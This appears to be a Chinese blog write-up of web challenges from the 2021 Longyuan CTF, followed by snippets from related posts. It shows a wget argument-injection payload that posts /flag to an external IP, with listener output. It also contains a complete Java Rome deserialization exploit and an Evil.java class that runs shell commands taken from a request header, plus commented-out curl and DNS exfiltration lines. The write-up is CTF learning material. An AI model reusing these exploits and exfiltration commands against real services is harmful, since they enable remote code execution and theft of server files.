bash: cannot set terminal process group (24): Inappropriate ioctl for device
bash: no job control in this shell
www-data@a4c71746264f:~/html$ ls
ls
index.php
www-data@a4c71746264f:~/html$ cd /
cd /
www-data@a4c71746264f:/$ ls
ls
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
php.ini
proc
root
run
sbin
srv
sudoers
sys
tmp
usr
var
www-data@a4c71746264f:/$ cat /flag
cat /flag
flag{b483c338-32f1-48a9-819f-72e276607834}

  • CheckIN

一道Go的代码审计,大致扫一遍应该就知道了,/wget是利用到,但是似乎鉴权没有做:

router.GET("/wget", getController)

func getController(c *gin.Context) {



    cmd := exec.Command("/bin/wget", c.QueryArray("argv")[1:]...)
    err := cmd.Run()
    if err != nil {
        fmt.Println("error: ", err)
    }
    
    c.String(http.StatusOK, "Nothing")
}

直接能执行命令了,拿wget把flag带出来即可:

/wget?argv=1&argv=--post-file&argv=/flag&argv=http://121.5.169.223:39876/

root@VM-0-6-ubuntu:~# nc -lvvp 39876
Listening on [0.0.0.0] (family 0, port 39876)
Connection from 117.21.200.166 37526 received!
POST / HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 121.5.169.223:39876
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 43

flag{88729834-1693-4af8-abba-0ebf6bd84ec2}

  • EasyJaba

给了个反序列化的入口,而且调用了toString()方法:

 @ResponseBody
    @RequestMapping({"/BackDoor"})
    public String BackDoor(@RequestParam(name = "ctf",required = true) String data) throws Exception {
        Set blacklist = new HashSet() {
            {
                this.add("java.util.HashMap");
                this.add("javax.management.BadAttributeValueExpException");
            }
        };
        Object object = null;
        byte[] b = Tool.base64Decode(data);
        InputStream inputStream = new ByteArrayInputStream(b);
        BlacklistObjectInputStream ois = new BlacklistObjectInputStream(inputStream, blacklist);

        try {
            object = ois.readObject();
        } catch (IOException var12) {
            var12.printStackTrace();
        } catch (ClassNotFoundException var13) {
            var13.printStackTrace();
        } finally {
            System.out.println("information:" + object.toString());
        }

        return "calm down....";
    }

但是有黑名单,看一下pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.5.6</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.kyzy.ctf</groupId>
    <artifactId>ezjaba</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjaba</name>
    <description>Demo project for Spring Boot</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>rome</groupId>
            <artifactId>rome</artifactId>
            <version>1.0</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>

有个rome显得很突兀,查一下确实有个链可以rce,但是需要用到被ban了的HashMap。但用到HashMap其实只是为了在Gadget中调用到那个toString,但本题已经显示的调用了,所以从网上找POC改一下即可:

package com.summer.test;


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.ObjectBean;
import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;

import java.io.ObjectOutputStream;

import java.lang.reflect.Field;

import java.util.Base64;

public class Test {

    public static class StaticBlock { }
    public static void main(String[] args) throws Exception {
        byte[][] bytecodes = new byte[][]{Base64.getDecoder().decode("xxx")};



        // 实例化类并设置属性
        TemplatesImpl templatesimpl = new TemplatesImpl();
        Field fieldByteCodes = templatesimpl.getClass().getDeclaredField("_bytecodes");
        fieldByteCodes.setAccessible(true);
        fieldByteCodes.set(templatesimpl, bytecodes);

        Field fieldName = templatesimpl.getClass().getDeclaredField("_name");
        fieldName.setAccessible(true);
        fieldName.set(templatesimpl, "test");

        Field fieldTfactory = templatesimpl.getClass().getDeclaredField("_tfactory");
        fieldTfactory.setAccessible(true);
        fieldTfactory.set(templatesimpl, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance());


        ObjectBean objectBean1 = new ObjectBean(Templates.class, templatesimpl);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(objectBean1);
        byte[] sss = byteArrayOutputStream.toByteArray();
        out.close();
        String exp = Base64.getEncoder().encodeToString(sss);
        System.out.println(exp.replace("+","%2b"));


    }
}

还是动态加载字节码,关键就是那个恶意类里面要执行的代码该怎么写了。
我先是在本地打通了,远程那边一直没有回显,猜测是不出网,问了一下出题人确实是不出网的。
然后就开始了一下午的不出网回显尝试,尝试了各种奇奇怪怪的东西,什么dns,tomcat的各种内存马,Spring的内存马,等等发现都没打通。。。至于为什么我也不知道,不太会Java,这些东西等以后自己慢慢学到了应该就知道了。
最后是找到了这个东西:

https://github.com/SummerSec/JavaLearnVulnerability/blob/master/Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/SpringEcho.java

感觉也不算是内存马吧,就是通过上下文还有反射最终来回显。我一开始也想过就是能不能按照Tomcat的Filter的那种思路(因为刚学过)去获取Request,再想办法获取获取Response,不是想办法注册Filter了,而是直接把结果回显,但是想了一下网上可能有现成的就一直在找现成的POC没去找这个东西,结果还是错付了。
写个Evil.java

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.net.InetAddress;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.*;
import java.lang.reflect.Method;
import java.util.Scanner;
public class Evil extends AbstractTranslet
{
            @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    public Evil() throws Exception{
                    Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
        Method m = c.getMethod("getRequestAttributes");
        Object o = m.invoke(null);
        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
        m = c.getMethod("getResponse");
        Method m1 = c.getMethod("getRequest");
        Object resp = m.invoke(o);
        Object req = m1.invoke(o); // HttpServletRequest
        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
        getHeader.setAccessible(true);
        getWriter.setAccessible(true);
        Object writer = getWriter.invoke(resp);
        String cmd = (String)getHeader.invoke(req, "cmd");
        String[] commands = new String[3];
        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
            commands[0] = "cmd";
            commands[1] = "/c";
        } else {
            commands[0] = "/bin/sh";
            commands[1] = "-c";
        }
        commands[2] = cmd;
        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
        writer.getClass().getDeclaredMethod("flush").invoke(writer);
        writer.getClass().getDeclaredMethod("close").invoke(writer);
    }
}
         //   String[] cmd = {"/bin/sh","-c","curl http://172.16.177.48:39555/ -F file=@/flag"};
         //           InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
//        byte[] bcache = new byte[1024];
//        int readSize = 0;
//        try(ByteArrayOutputStream outputStream = new ByteArrayOutputStream()){
//            while ((readSize =in.read(bcache))!=-1){
//                outputStream.write(bcache,0,readSize);
//            }
//            String result = outputStream.toString();
//        InetAddress.getByName("1m22164l.ns.dns3.cf.").isReachable(3000);
//      }

       // }

            //Runtime.getRuntime().exec("sh /tmp/feng");
        //}
        //catch (Exception ex) {
        //    ex.printStackTrace();
        //}

然后javac编译成class,然后cat Evil.class|base64 -w 0,再把这段base64扔到上面的那个代码里面的byte[][] bytecodes = new byte[][]{Base64.getDecoder().decode();,生成payload,然后打过去就回显了:
在这里插入图片描述

七堇墨年
关注
2021陇原战
hezhing
12-08 304
2021陇原战役 可惜只做了一个密码学。还是用软件直出的。我真垃圾。赛后复盘。 参考链接 2021陇原战WP - n03tAck MISC soEasyCheckin 打开是一串加密。看编码是base32加密。解码发现是e开头,后面有5位的hex加密。但这里有个没解出来。根据前后可以推测为e。替换以后hex解密。 hex解密为社会主义核心价值观,但这里有个文明的文被替换掉了。这里换回去解密。 解密得到flag: SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4} 打败
2021陇剑杯网络安全大赛wp-webshell部分(详细题解)
偷一个月亮
09-15 6781
3.1 3.2 其中web根目录可以再system命令中看到 3.3 3.4 3.5 写frpc配置文件,推测为frpc,正确 实际上传动作为 L3Zhci93d3cvaHRtbC9mcnBj解码base64即为/var/www/html/frpc 3.6 3.5中写配置动作,hex转字符后,如下 3.7 同上 ...
陇原战2021网络安全大赛 Web EasyJaba
Sk1y的博客
07-02 1420
恶意字节码加载,Rome链,靶机不出网,使用Hashtable绕过入口类的限制,
陇原战2021网络安全大赛 Web CheckIN
Sk1y的博客
12-24 3229
checkin 文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接 参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入 题目有附件 下载,是个go语言,审计一下 ,文件目录如下 注意wget 还有 wget外带数据 根据上面的博客,可以执行命令wegt数据外带出来 wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/ 然后既可以得到flag
陇原战2021网络安全大赛 Web MagicMail
Sk1y的博客
11-19 3408
知识点:本地起一个smtp服务,利用模板注入,找到可用的类 文章目录MagicMail注入点测试模板注入参考链接 MagicMail 注入点 这个题目很有意思,赛后根据官方wp进行复现 首先是,我们需要输入一个有smtp服务的ip和相应的端口,这个可以在自己的vps起一个smtp服务 python3 -m smtpd -c DebuggingServer -n 0.0.0.0:6667 输入自己的服务器ip和6667(ip和port根据自己的情况修改) 然后就是一个可以发送邮件的功能 在email的内
陇原战""2021网络安全大赛writeup
渗透测试研究中心
12-22 4616
Web1.Checkin解题思路这道题 前面根据 源码应该是 nosql注入,我分析的payload:username='||1){returntrue;}})//&password=123456盲注得admin/54a83850073b0f4c6862d5a1d48ea84fimporttimeimportrequestsimportstringsession=reque...
2021年“绿城杯”网络安全大赛
09-30
2021年“绿城杯”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络...
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
陇原战2021网络安全大赛Writeup
Le1a's Blog
11-08 6222
Web CheckIN 源代码的这两处: 先尝试访问/wget:/wget?argv=a,看出来这里应该是可以进行攻击的了 接着尝试利用wget的--post-file进行数据外带,读取源代码 在自己VPS开个监听并且构造: /wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/ 拿到flag: flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f} Misc
openbr:开源生物特征识别,人脸识别
02-11
标识最新的稳定例如“ v1.1.0” 下载所有OpenBR源代码并切换到该发行标签: $ git clone $ cd openbr $ git checkout(例如:git checkout v1.1.0)$ git子模块初始化$ git子模块更新 按照适用于您的操作系统的来构建OpenBR。
android-studio-bundle-135.1740770-windows官网最新版
03-27
android-studio-bundle-135.1740770-windows.exe官网最新版 注:直接使用迅雷新建任务下载即可(本人亲测,不会被屏蔽)
陇原战web部分wp
fmyyy1的博客
11-08 878
web CheckIN 下载源码,看到这里 这里调用wget,并且参数可控,可以直接外带数据,查看绑定路由 尝试访问/wget?argv=1 这里应该是出题人失误,无需登录可直接访问,利用–post-file参数直接外带文件 payload /wget?argv=fmyyy&argv=--post-file&argv=/flag&argv=http://124.70.40.5:1234 服务器开个监听直接打就行 eaaasyphp 反序列化,有个file_put_conten
陇原战2021网络安全大赛 Re
PMR的博客
11-15 4416
1、 EasyRe IDA载入附件,搜索字符串得 flag: FLAG:flag{fc5e038d38a57032085441e7fe7010b0} 2、 findme 常规的流程,flag的加密和校验都在 off_403844: 跟进去发现 指向strcmp: 然后它又被 sub_401A0E 动过,向上回溯: 所以我们的目标是 sub_401866: 大概看了一下,确定是 RC4,整体还是挺干净的就一个库函数 strlen,当时是想偷懒,用以前的Unicorn脚本改了一下直接跑出来的:
陇原战2021网络安全大赛的一道web
errorr0
04-30 357
复现以前打过的比赛题
[陇原战2021网络安全大赛]eaaasyphp
cosmoslin的博客
11-11 3166
eaaasyphp <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Hint { public function __wakeup(){ $this-&gt
陇原战2021网络安全大赛 bbbaby和Magic
zylxixixi的博客
11-17 355
一、bbbaby 首先对程序进行分析 ,程序较为简单,提供了修改地址内容和输入任意大小内容的功能,存在栈溢出的可能。 因为事情多,就看了眼题,最开始我想使用利用栈溢出再使用chk_stack_fail泄露出libc版本信息,虽然成功打印出libc地址但是已经退出了程序。参考了大佬陇原战2021网络安全大赛-pwn-wp - LynneHuan - 博客园 , 后面的思路为首先利用提供的修改地址内容的功能,将chk_stack_fail的got地址修改为puts的plt地址,然后通过栈溢出
陇原战2021网络安全大赛_Crypto_复现
M3ng@L的博客
02-28 6999
陇原战2021网络安全大赛_Crypto_复现mostlycommonDecryption codeDecryption~codeDecryption codeeasytaskDecryption codeDecryption~codeDecryption codePerferencePerferencePerferenceCivet cat for PrinceDescriptionDescriptionDescriptionAnalysisAnalysisAna
陇原战2021 web方向部分复现wp
Mrs_H的博客
11-13 1785
前言 今天白天打深育杯,人被打傻了。Web方向的题目是越来越离谱了,到最后比赛结束都只有3道Web题有人解出来。晚上没事闲的打开BUU一看,上次陇原战的题目没有下线,正好回去看看,当初因为vps出了一些情况被腾讯云的工作人员拿去修了,结果到了晚上才还给我,于是我就从这场比赛断开连接了。 正文 这里只复现两道题,剩下的java题目因为当前对java方向的安全漏洞利用还很生疏就先不去看了,等以后学完Java再回来看吧。 1.CheckIN 这道题属于是白给题目,不愧是签到题,很久没有见到这么友善的签到题了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

七堇墨年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值